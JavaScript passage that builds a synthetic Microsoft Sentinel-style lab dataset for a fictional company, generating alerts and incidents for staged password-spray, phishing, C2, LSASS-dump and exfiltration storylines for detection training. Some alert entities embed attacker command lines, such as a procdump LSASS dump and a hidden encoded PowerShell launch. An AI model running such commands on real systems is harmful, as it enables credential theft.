  for (let i = 0; i < 9; i++) mk(s3 + 120000 + i * 2000, "LogonSuccess", "Network", "Kerberos", "", "akowalski", "FAB-WKS-117", "10.11.7.117", "FAB-DC01", { app: "Active Directory" });
  /* cloud app logons via DfCA */
  for (let i = 0; i < 12; i++) { const u = USERS[int(0, 24)][0]; mk(tAgo(0, 168), "LogonSuccess", "OAuth2:Authorize", "", "", u, "", pick(PUB_IPS), "", { app: pick(["Microsoft 365", "Salesforce", "Box", "Dropbox"]), loc: "US", isp: "Comcast Cable" }); }
  mk(LAB_NOW - 26 * H + 20 * M, "LogonSuccess", "OAuth2:Authorize", "", "", "mchen", "", LAGOS_IP, "", { app: "Microsoft 365", loc: "NG", isp: "MTN Nigeria" });
  table("IdentityLogonEvents", cols, sortByTime(rows));
}

/* ======================= SecurityAlert (≈210) + SecurityIncident (≈80) ======================= */
{
  const aCols = [["TimeGenerated", "datetime"], ["AlertName", "string"], ["AlertSeverity", "string"], ["Description", "string"], ["ProviderName", "string"], ["VendorName", "string"], ["AlertType", "string"], ["SystemAlertId", "string"], ["StartTime", "datetime"], ["EndTime", "datetime"], ["ProcessingEndTime", "datetime"], ["Status", "string"], ["CompromisedEntity", "string"], ["Entities", "string"], ["ExtendedProperties", "string"], ["Tactics", "string"], ["Techniques", "string"], ["ProductName", "string"], ["ProductComponentName", "string"], ["RemediationSteps", "string"], ["ConfidenceLevel", "string"], ["IsIncident", "bool"], ["AlertLink", "string"]];
  const alerts = []; const ids = [];
  const mk = (t, name, sev, prov, prod, comp, tactics, techs, entity, ents, o = {}) => { const id = guid(); ids.push({ id, t, name, sev, prov, prod }); alerts.push([dt(t), name, sev, o.desc || `${name} was detected on ${entity}.`, prov, "Microsoft", o.type || name.replace(/\W+/g, "_"), id, dt(t - (o.dur || 5 * M)), dt(t), dt(t + 2 * M), o.status || "New", entity, JSON.stringify(ents), JSON.stringify(o.ext || {}), tactics, techs, prod, comp, o.rem || "", o.conf || "", false, `https://security.microsoft.com/alerts/${id}`]); return id; };
  const PROV = { mde: ["MDATP", "Microsoft Defender Advanced Threat Protection", ""], mdo: ["OATP", "Microsoft Defender for Office 365", ""], mdi: ["Azure Advanced Threat Protection", "Azure Advanced Threat Protection", ""], aadip: ["IPC", "Azure Active Directory Identity Protection", ""], mdca: ["MCAS", "Microsoft Cloud App Security", ""], asi: ["ASI Scheduled Alerts", "Microsoft Sentinel", "Scheduled Alerts"], mdc: ["Azure Security Center", "Azure Security Center", "Virtual Machines"] };
  const A = (p) => PROV[p];
  /* background alerts */
  const BG = [["Suspicious PowerShell command line", "Medium", "mde", "Execution", "T1059.001"], ["An active 'Mimikatz' malware was detected", "High", "mde", "CredentialAccess", "T1003"], ["Anomalous Token", "Medium", "aadip", "InitialAccess", "T1078"], ["Unfamiliar sign-in properties", "Medium", "aadip", "InitialAccess", "T1078"], ["Email messages containing malicious URL removed after delivery", "Informational", "mdo", "InitialAccess", "T1566.002"], ["Email reported by user as malware or phish", "Low", "mdo", "InitialAccess", "T1566"], ["Activity from infrequent country", "Medium", "mdca", "InitialAccess", "T1078"], ["Impossible travel activity", "Medium", "mdca", "InitialAccess", "T1078"], ["Suspicious authentication activity", "Medium", "mdc", "CredentialAccess", "T1110"], ["Antimalware Action Taken", "Low", "mdc", "Execution", "T1204"], ["Failed logon attempts from a single IP", "Medium", "asi", "CredentialAccess", "T1110"], ["Rare RDP connection", "Low", "asi", "LateralMovement", "T1021.001"], ["Suspicious resource / resource group deployment by a previously unseen caller", "Medium", "asi", "Impact", "T1496"], ["Multiple password reset by user", "Low", "asi", "Persistence", "T1098"]];
  for (let i = 0; i < 150; i++) { const b = pick(BG); const p = A(b[2]); const u = USERS[int(0, 24)][0]; const host = pick(WKS); const ent = b[2] === "mde" ? `${host.toLowerCase()}.fabrikam.com` : upn(u); mk(tAgo(0, 168), b[0], b[1], p[0], p[1], p[2], b[3], b[4], ent, [{ $id: "1", Type: b[2] === "mde" ? "host" : "account", HostName: b[2] === "mde" ? host : undefined, Name: b[2] !== "mde" ? u : undefined, UPNSuffix: b[2] !== "mde" ? "fabrikam.com" : undefined }], { status: chance(.4) ? "Resolved" : "New" }); }
  /* storyline alerts (newer timestamps, reflect the events) */
  const sprayStart = LAB_NOW - 41 * H, s3 = LAB_NOW - 20 * H, bf = LAB_NOW - 52 * H, ph = LAB_NOW - 44 * H, s6 = LAB_NOW - 15 * H, s7 = LAB_NOW - 29 * H;
  const idSpray = mk(sprayStart + 35 * M, "Password spray attack", "High", A("aadip")[0], A("aadip")[1], "", "CredentialAccess", "T1110.003", upn("rlopez"), [{ $id: "1", Type: "account", Name: "rlopez", UPNSuffix: "fabrikam.com" }, { $id: "2", Type: "ip", Address: SPRAY_IP }], { ext: { "Risk level": "high", "Detection type": "Password spray" }, dur: 35 * M });
  const idSprayS = mk(sprayStart + 36 * M, "Failed logon attempts from a single IP", "Medium", A("asi")[0], A("asi")[1], A("asi")[2], "CredentialAccess", "T1110", SPRAY_IP, [{ $id: "1", Type: "ip", Address: SPRAY_IP }], { ext: { Query: "SigninLogs | where ResultType == \"50126\" | summarize dcount(UserPrincipalName) by IPAddress | where dcount_UserPrincipalName > 10", "Query Results Aggregation": "SingleAlert" }, dur: 30 * M });
  const idRule = mk(LAB_NOW - 40 * H + 1 * M, "Suspicious inbox manipulation rule", "High", A("mdo")[0], A("mdo")[1], "", "Persistence,Collection", "T1114.003", upn("rlopez"), [{ $id: "1", Type: "mailbox", MailboxPrimaryAddress: upn("rlopez"), DisplayName: "Rosa Lopez" }, { $id: "2", Type: "account", Name: "rlopez", UPNSuffix: "fabrikam.com" }], { ext: { "Rule name": ".", ForwardTo: "r.lopez.payments@mail.example" } });
  const idFwd = mk(LAB_NOW - 40 * H + 3 * M, "Suspicious email forwarding", "Medium", A("mdca")[0], A("mdca")[1], "", "Exfiltration", "T1114.003", upn("rlopez"), [{ $id: "1", Type: "account", Name: "rlopez", UPNSuffix: "fabrikam.com" }]);
  const idTravel = mk(LAB_NOW - 26 * H + 25 * M, "Impossible travel activity", "Medium", A("mdca")[0], A("mdca")[1], "", "InitialAccess", "T1078", upn("mchen"), [{ $id: "1", Type: "account", Name: "mchen", UPNSuffix: "fabrikam.com" }, { $id: "2", Type: "ip", Address: LAGOS_IP }, { $id: "3", Type: "ip", Address: "10.11.4.77" }]);
  const idAtypical = mk(LAB_NOW - 26 * H + 21 * M, "Atypical travel", "Medium", A("aadip")[0], A("aadip")[1], "", "InitialAccess", "T1078", upn("mchen"), [{ $id: "1", Type: "account", Name: "mchen", UPNSuffix: "fabrikam.com" }, { $id: "2", Type: "ip", Address: LAGOS_IP }], { ext: { "Risk level": "high" } });
  const idPs = mk(s3 + 40000, "Suspicious PowerShell command line", "Medium", A("mde")[0], A("mde")[1], "", "Execution", "T1059.001", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "account", Name: "akowalski", NTDomain: "FABRIKAM" }, { $id: "3", Type: "process", CommandLine: "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo..." }]);
  const idOffice = mk(s3 + 41000, "Suspicious process launched by Office application", "High", A("mde")[0], A("mde")[1], "", "InitialAccess,Execution", "T1566.001,T1204.002", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "file", Name: "Invoice_88213.docm", Directory: "C:\\Users\\akowalski\\Downloads" }]);
  const idCert = mk(s3 + 60000, "Use of living-off-the-land binary to download content", "Medium", A("mde")[0], A("mde")[1], "", "CommandAndControl,DefenseEvasion", "T1105,T1218", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "url", Url: `http://${C2_HOST}/u/svc.dat` }]);
  const idC2 = mk(s3 + 2 * H, "Connection to a known malicious command-and-control server", "High", A("mde")[0], A("mde")[1], "", "CommandAndControl", "T1071.001", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "ip", Address: C2_IP }, { $id: "3", Type: "dns", DomainName: C2_HOST }]);
  const idSched = mk(s3 + 95000, "Suspicious scheduled task created", "Medium", A("mde")[0], A("mde")[1], "", "Persistence", "T1053.005", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }]);
  const idRecon = mk(s3 + 100000, "Domain reconnaissance using nltest and net", "Low", A("mde")[0], A("mde")[1], "", "Discovery", "T1018,T1069.002", "fab-wks-117.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-WKS-117", DnsDomain: "fabrikam.com" }]);
  const idBf = mk(bf + 10 * M, "Suspected Brute Force attack (Kerberos, NTLM)", "Medium", A("mdi")[0], A("mdi")[1], "", "CredentialAccess", "T1110", "FAB-DC01", [{ $id: "1", Type: "host", HostName: "KALI" }, { $id: "2", Type: "ip", Address: SCAN_IP }, { $id: "3", Type: "host", HostName: "FAB-DC01", DnsDomain: "fabrikam.com" }], { dur: 10 * M });
  const idBfS = mk(bf + 11 * M, "Failed logon attempts from a single IP", "Medium", A("asi")[0], A("asi")[1], A("asi")[2], "CredentialAccess", "T1110", SCAN_IP, [{ $id: "1", Type: "ip", Address: SCAN_IP }, { $id: "2", Type: "host", HostName: "FAB-DC01", DnsDomain: "fabrikam.com" }], { ext: { Query: "SecurityEvent | where EventID == 4625 | summarize count() by IpAddress | where count_ > 20" } });
  const idLsass = mk(bf + 31 * M, "Suspicious access to LSASS service", "High", A("mde")[0], A("mde")[1], "", "CredentialAccess", "T1003.001", "fab-dc01.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-DC01", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "process", CommandLine: "procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\ls.dmp" }, { $id: "3", Type: "account", Name: "svc-backup2", NTDomain: "FABRIKAM" }]);
  const idNewAdmin = mk(bf + 17 * M, "User added to privileged group", "Medium", A("asi")[0], A("asi")[1], A("asi")[2], "Persistence,PrivilegeEscalation", "T1098", "FABRIKAM\\svc-backup2", [{ $id: "1", Type: "account", Name: "svc-backup2", NTDomain: "FABRIKAM" }]);
  const idClear = mk(bf + 41 * M, "Security event log cleared", "High", A("asi")[0], A("asi")[1], A("asi")[2], "DefenseEvasion", "T1070.001", "FAB-DC01.fabrikam.com", [{ $id: "1", Type: "host", HostName: "FAB-DC01", DnsDomain: "fabrikam.com" }, { $id: "2", Type: "account", Name: "svc-backup2", NTDomain: "FABRIKAM" }]);
  const idPhish = mk(ph + 20 * M, "Email messages containing malicious URL removed after delivery", "Informational", A("mdo")[0], A("mdo")[1], "", "InitialAccess", "T1566.002", "billing@northwind-pay.example", [{ $id: "1", Type: "mailcluster", ClusterId: 884721, CountByDeliveryStatus: { Delivered: 22, Junked: 5, Blocked: 3 } }, { $id: "2", Type: "mailmessage", Subject: "Invoice overdue - action required", Sender: "billing@northwind-pay.example" }], { ext: { "Zapped messages": "22" } });
  const idPhishUser = mk(ph + 55 * M, "Email reported by user as malware or phish", "Low", A("mdo")[0], A("mdo")[1], "", "InitialAccess", "T1566", upn("cmoreau"), [{ $id: "1", Type: "mailbox", MailboxPrimaryAddress: upn("cmoreau") }]);
  const idMass = mk(s6 + 12 * M, "Mass download by a single user", "Medium", A("mdca")[0], A("mdca")[1], "", "Exfiltration", "T1567.002", upn("jpatel"), [{ $id: "1", Type: "account", Name: "jpatel", UPNSuffix: "fabrikam.com" }, { $id: "2", Type: "ip", Address: "73.44.182.90" }], { ext: { "Files downloaded": "60" } });
  const idLink = mk(s6 - 2 * M, "Anonymous link created for sensitive file", "Low", A("asi")[0], A("asi")[1], A("asi")[2], "Exfiltration", "T1567", upn("jpatel"), [{ $id: "1", Type: "account", Name: "jpatel", UPNSuffix: "fabrikam.com" }, { $id: "2", Type: "file", Name: "Customer-list.csv" }]);
  const idNsg = mk(s7 + 5 * M, "Suspicious NSG rule exposing management port to the Internet", "Medium", A("asi")[0], A("asi")[1], A("asi")[2], "InitialAccess", "T1190", "nsg-app", [{ $id: "1", Type: "azure-resource", ResourceId: "/subscriptions/x/resourceGroups/RG-Prod/providers/Microsoft.Network/networkSecurityGroups/nsg-app" }, { $id: "2", Type: "account", Name: "svc-automation", UPNSuffix: "fabrikam.com" }, { $id: "3", Type: "ip", Address: KV_IP }]);
  const idKv = mk(s7 + 8 * M, "Access from a suspicious IP to a key vault", "Medium", A("mdc")[0], A("mdc")[1], "Key Vaults", "CredentialAccess", "T1552", "kv-fab-prod", [{ $id: "1", Type: "azure-resource", ResourceId: "/subscriptions/x/resourceGroups/RG-Prod/providers/Microsoft.KeyVault/vaults/kv-fab-prod" }, { $id: "2", Type: "ip", Address: KV_IP }]);
  const idRdp = mk(LAB_NOW - 28 * H + 15 * M, "Successful RDP brute force attack", "High", A("mdc")[0], A("mdc")[1], "Virtual Machines", "InitialAccess", "T1110", "vm-app-0", [{ $id: "1", Type: "host", HostName: "FAB-APP01" }, { $id: "2", Type: "ip", Address: KV_IP }, { $id: "3", Type: "account", Name: "svc-automation" }]);
  const idScan = mk(LAB_NOW - 54 * H + 4 * M, "Port scan detected at the perimeter", "Low", A("asi")[0], A("asi")[1], A("asi")[2], "Reconnaissance", "T1046", SCAN_IP, [{ $id: "1", Type: "ip", Address: SCAN_IP }], { ext: { Query: "CommonSecurityLog | where DeviceAction == \"deny\" | summarize dcount(DestinationPort) by SourceIP | where dcount_DestinationPort > 25" } });
  table("SecurityAlert", aCols, sortByTime(alerts));

  /* ---- incidents ---- */
  const iCols = [["TimeGenerated", "datetime"], ["IncidentNumber", "int"], ["Title", "string"], ["Description", "string"], ["Severity", "string"], ["Status", "string"], ["Classification", "string"], ["ClassificationReason", "string"], ["ClassificationComment", "string"], ["Owner", "dynamic"], ["ProviderName", "string"], ["ProviderIncidentId", "string"], ["FirstActivityTime", "datetime"], ["LastActivityTime", "datetime"], ["CreatedTime", "datetime"], ["LastModifiedTime", "datetime"], ["ClosedTime", "datetime"], ["AlertIds", "dynamic"], ["Labels", "dynamic"], ["RelatedAnalyticRuleIds", "dynamic"], ["AdditionalData", "dynamic"], ["ModifiedBy", "string"], ["IncidentUrl", "string"], ["IncidentName", "string"]];
  const incs = []; let num = 4000;
  const OWNERS = [{ objectId: userId["dnguyen"], email: upn("dnguyen"), assignedTo: "Dan Nguyen", userPrincipalName: upn("dnguyen") }, { objectId: userId["pmurphy"], email: upn("pmurphy"), assignedTo: "Pat Murphy", userPrincipalName: upn("pmurphy") }, { objectId: userId["fdiaz"], email: upn("fdiaz"), assignedTo: "Fer Diaz", userPrincipalName: upn("fdiaz") }, { objectId: null, email: null, assignedTo: null, userPrincipalName: null }];
  const mkI = (created, title, sev, status, alertIds, o = {}) => { const n = o.num || ++num; const name = guid(); const closed = status === "Closed"; const prods = [...new Set(alertIds.map(id => ids.find(a => a.id === id)?.prod).filter(Boolean))]; const tac = o.tactics || []; const row = (t, st, cls, mod) => incs.push([dt(t), n, title, o.desc || `${title}. Incident grouped from ${alertIds.length} alert${alertIds.length === 1 ? "" : "s"}.`, sev, st, cls, cls === "TruePositive" ? "SuspiciousActivity" : cls === "BenignPositive" ? "SuspiciousButExpected" : cls === "FalsePositive" ? pick(["InaccurateData", "IncorrectAlertLogic"]) : "", cls && cls !== "Undetermined" ? o.comment || "" : "", st === "New" ? OWNERS[3] : (o.owner || OWNERS[int(0, 2)]), "Azure Sentinel", String(n), dt(created - (o.span || 10 * M)), dt(created), dt(created), dt(t), st === "Closed" ? dt(t) : null, alertIds, o.labels || [], o.rules || [], { alertsCount: alertIds.length, bookmarksCount: 0, commentsCount: st === "New" ? 0 : int(1, 4), alertProductNames: prods, tactics: tac }, mod, `https://portal.azure.com/#asset/Microsoft_Azure_Security_Insights/Incident/${name}`, name]); row(created, "New", "Undetermined", "Microsoft Sentinel"); if (status !== "New") row(created + (o.ackMin || int(10, 240)) * M, "Active", "Undetermined", OWNERS[int(0, 2)].userPrincipalName); if (closed) row(created + (o.closeMin || int(300, 2000)) * M, "Closed", o.cls || "TruePositive", OWNERS[int(0, 2)].userPrincipalName); };
  /* background incidents from background alerts */
  const bgIds = ids.slice(0, 150);
  for (let i = 0; i < 48; i++) { const a = bgIds[i * 3]; const extra = chance(.3) ? [bgIds[i * 3 + 1].id] : []; const st = pick(["New", "Active", "Closed", "Closed", "Closed"]); mkI(a.t + 2 * M, a.name, a.sev, st, [a.id, ...extra], { cls: pick(["TruePositive", "BenignPositive", "FalsePositive", "FalsePositive"]), labels: chance(.3) ? [{ labelName: "needs-tuning", labelType: "User" }] : [] }); }
  /* storyline incidents */
  mkI(sprayStart + 37 * M, "Password spray attack", "High", "Active", [idSpray, idSprayS], { tactics: ["CredentialAccess"], labels: [{ labelName: "account-compromise", labelType: "User" }], span: 36 * M, num: 4101 });
  mkI(LAB_NOW - 40 * H + 4 * M, "Suspicious inbox manipulation rule", "High", "Active", [idRule, idFwd], { tactics: ["Persistence", "Collection", "Exfiltration"], num: 4102, labels: [{ labelName: "account-compromise", labelType: "User" }] });
  mkI(LAB_NOW - 26 * H + 26 * M, "Impossible travel activity", "Medium", "Closed", [idTravel, idAtypical], { tactics: ["InitialAccess"], cls: "BenignPositive", comment: "User confirmed travel to Lagos office; VPN not used.", num: 4103, closeMin: 190 });
  mkI(s3 + 45000, "Multi-stage incident involving Initial access & Command and control on one endpoint", "High", "Active", [idOffice, idPs, idCert, idC2, idSched, idRecon], { tactics: ["InitialAccess", "Execution", "CommandAndControl", "Persistence", "Discovery"], num: 4104, desc: "Multi-stage incident involving Initial access & Command and control on one endpoint reported by multiple sources. Attack disruption contained the device.", labels: [{ labelName: "Attack Disruption", labelType: "System" }] });
  mkI(bf + 12 * M, "Suspected Brute Force attack (Kerberos, NTLM)", "Medium", "Active", [idBf, idBfS], { tactics: ["CredentialAccess"], num: 4105 });
  mkI(bf + 32 * M, "Suspicious access to LSASS service", "High", "New", [idLsass, idNewAdmin, idClear], { tactics: ["CredentialAccess", "Persistence", "DefenseEvasion"], num: 4106 });
  mkI(ph + 22 * M, "Email messages containing malicious URL removed after delivery", "Informational", "Closed", [idPhish, idPhishUser], { tactics: ["InitialAccess"], cls: "TruePositive", comment: "ZAP removed 22 messages; 3 users clicked, passwords reset.", num: 4107, closeMin: 400 });
  mkI(s6 + 13 * M, "Mass download by a single user", "Medium", "Active", [idMass, idLink], { tactics: ["Exfiltration"], num: 4108 });
  mkI(s7 + 9 * M, "Suspicious NSG rule exposing management port to the Internet", "Medium", "Active", [idNsg, idKv], { tactics: ["InitialAccess", "CredentialAccess"], num: 4109 });
  mkI(LAB_NOW - 28 * H + 16 * M, "Successful RDP brute force attack", "High", "New", [idRdp], { tactics: ["InitialAccess"], num: 4110 });
  mkI(LAB_NOW - 54 * H + 5 * M, "Port scan detected at the perimeter", "Low", "Closed", [idScan], { tactics: ["Reconnaissance"], cls: "TruePositive", comment: "Blocked at the firewall; no follow-on seen at the time.", num: 4111, closeMin: 60 });
  table("SecurityIncident", iCols, sortByTime(incs));
}

/* lab db */
export const LAB_TABLES = T;
export const LAB_DB = { tables: T, now: LAB_NOW };
export const TABLE_NOTES = {
  SigninLogs: "Entra ID interactive sign-ins. ResultType is a string: \"0\" is success. LocationDetails / DeviceDetail / Status are dynamic.",
  SecurityEvent: "Windows Security events via AMA (4624 logon, 4625 failure, 4688 process, 4672 privileges, 4720 user created, 4732 group add, 1102 log cleared). EventID is a number.",
  SecurityAlert: "Alerts from every Microsoft provider. Entities and ExtendedProperties are JSON text — parse_json() first.",
  SecurityIncident: "One row per incident update: the latest row per IncidentNumber is the current state (summarize arg_max(LastModifiedTime, *) by IncidentNumber).",
  DeviceProcessEvents: "Defender for Endpoint process creations. AdditionalFields is JSON text.",
  DeviceNetworkEvents: "Defender for Endpoint network connections (ConnectionSuccess, ConnectionFailed, InboundConnectionAccepted).",
  DeviceLogonEvents: "Defender for Endpoint logons (LogonSuccess / LogonFailed; LogonType is a word: Interactive, Network, RemoteInteractive).",
  EmailEvents: "Defender for Office 365 mail flow. ThreatTypes is a comma-separated string; DetectionMethods / AuthenticationDetails are JSON text.",
  OfficeActivity: "Unified audit log (Exchange, SharePoint, OneDrive, Teams). Parameters is JSON text; Operation names like New-InboxRule, FileDownloaded, MailItemsAccessed.",
  CommonSecurityLog: "CEF via AMA from the Palo Alto and Fortinet firewalls. DeviceAction allow/deny/alert.",
  AzureActivity: "Azure control-plane operations. Properties / HTTPRequest are JSON text; Authorization_d and Claims_d are dynamic.",
  IdentityLogonEvents: "Defender for Identity (on-prem AD) and Defender for Cloud Apps logons.",
};
